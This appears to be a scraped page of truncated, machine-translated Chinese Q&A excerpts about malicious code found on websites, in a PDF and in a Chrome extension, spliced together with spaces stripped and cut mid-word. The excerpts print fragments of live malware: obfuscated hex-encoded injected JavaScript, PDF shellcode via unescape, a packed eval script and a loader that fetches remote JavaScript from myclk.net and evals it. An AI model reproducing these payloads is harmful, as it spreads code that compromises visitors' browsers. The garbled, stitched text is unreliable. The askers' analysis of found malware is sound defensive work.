我在我的网站源代码中找到了这段代码:var_0xd28d=["\x5F\x30\x78\x33\x32\x6C\x73\x6A\x39","\x5F\x78\x6C\x74","\x5F\x78\x38\x66\x6B\x63\x33","\x66\x6C\x6F\x6F\x72","\x72\x61\x6E\x64\x6F\x6D","\x6C\x65\x6E\x67\x74\x68"];var_0x9ae4=[_0xd28d[0],12,_0xd28d[1],_0xd28d[2],2,31,Math,_0xd28d[3]];var_0xcd6e=[_0x9ae4[5],_0x9ae
我的一个friend的网站被列为恶意网站,我们发现一些混淆代码在他不知情的情况下被注入(inject)到他的index.php中。我对代码进行了两级反混淆,发现了这一点:(codecanbeviewedintheedithistory)谁能告诉我它想做什么以及为什么它是恶意的......? 最佳答案 总而言之,代码“解码”了放置的HTML在恶意URL中加载。以下行具有“编码”的HTML:n=["9","9","45","42",...每个数字代表一个以base-25为基数的字符。代码将遍历此数组并使用javascript的Strin
我有一个PDF文件,我知道它包含一个JavaScript脚本文件,该文件会做一些恶意的事情,但目前还不确定是什么。我已经成功解压缩了PDF文件并获得了纯文本JavaScript源代码,但它是代码本身,如果有点隐藏在我以前从未见过的这种语法中的话。代码示例:这是大部分代码的样子varbDWXfJFLrOqFuydrq=unescape;varQgFjJUluesCrSffrcwUwOMzImQinvbkaPVQwgCqYCEGYGkaGqery=bDWXfJFLrOqFuydrq('%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f9
所以我安装了这个外观粗略的chrome扩展程序,它需要“访问所有浏览数据”,所以我看了一下它的内部结构。它包含两个相同的文件,一个是名称正确的content.js,另一个是名称可疑的background.js,以及看起来像是未修改版本的jquery。其他两个包含相同的代码,我担心它看起来像一个键盘记录器。这是我在打包时必须使用jsfiddle整理的代码:eval(function(p,a,c,k,e,d){e=function(c){returnc};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){r
我在这个问题上有点迷茫,所以请原谅。我知道SO上还有其他关于此的主题,但我找不到答案。在网站上,当它被加载时,用户点击它的位置并不重要,它是在浏览器中打开带有广告的附加选项卡。到目前为止,通过查看浏览器控制台我能够找到的是加载了一些js文件http://cdn.mecash.ru/js/replace.js这个文件包含!function(w){if(w.self==w.top){varr=newXMLHttpRequest;r.onload=function(){eval(this.responseText)},r.open("get","//myclk.net/js/tx.js",!
我们最近接到一位客户的电话,提示他们网站的页面底部有一些“看起来很奇怪的代码”。我们查看了源代码,发现templates/master中附加了大约800字节的恶意javascript代码。文件,在之后标签。我不会发布上述代码,因为它看起来特别讨厌。据我所知,除非有人可以直接访问服务器和/或FTP登录详细信息,否则无法以任何方式编辑此文件。实际文件本身已被修改,因此排除了任何类型的SQL攻击。除了一个人以物理方式获得凭据并手动修改此文件之外,对于发生的事情还有其他合乎逻辑的解释吗?有没有其他人遇到过类似的事情? 最佳答案 我要检查的地
我在Facebook上收到一条消息,告诉我将其复制并粘贴到我的地址栏中。我想我会把它贴在这里,看看大家怎么看。它有什么作用?它是如何工作的?这里是源代码://(DONOTDOTHIS!)Javascript:vara=["\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x61\x70\x70\x34\x39\x34\x39\x37\x35\x32\x38\x37\x38\x5F\x61\x70\x70\x34\x39\x34\x39\x37\x35\x32\x38\x37\x38\x5F\x64\x64","\x67\x65\x74\x45\x6C\x6
关闭。这个问题需要detailsorclarity.它目前不接受答案。想改进这个问题吗?通过editingthispost添加细节并澄清问题.关闭3年前。Improvethisquestion我有以下3个“dataURL图像”,如果您通过“URL”打开它们,它们都会返回相同的图像,但下面的两个dataURL代码最后嵌入了“PHP代码”和“JavaScript代码”。如何从我的base64dataURL图片中删除那些来self不信任的用户的恶意代码。base64dataURL图片(安全):data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD
我正在寻找每个类别的推荐免费收费适用于可移植可执行文件(native/非.NET)恶意软件分析的易于使用的调试器。 最佳答案 在免费类别中,Olly是国王。如果您使用的是WinXP或更早版本,SoftICE也很棒,尽管现在很难找到它的副本。在付费类别中是IDAPro,Handlebars放下。克里斯·伊格尔wroteanexcellentbook向您展示如何使用IDA进行高级逆向工程。还要澄清一下Marco,UPX只能用于解压最初用UPX打包的可执行文件。许多非常复杂的恶意软件二进制文件使用自定义打包技术,无法使用UPX逆转。
关闭。这个问题需要debuggingdetails.它目前不接受答案。编辑问题以包含desiredbehavior,aspecificproblemorerror,andtheshortestcodenecessarytoreproducetheproblem.这将有助于其他人回答问题。关闭7年前。Improvethisquestion我使用C++Win32API和boost库编写了自己的代码。代码编译为适用于Windows的EXE应用程序。我可以保证它不含恶意软件,但virustotal.com报告称,56款防病毒软件中有9款会将exe文件识别为带有恶意软件。我看不出为什么会发生这种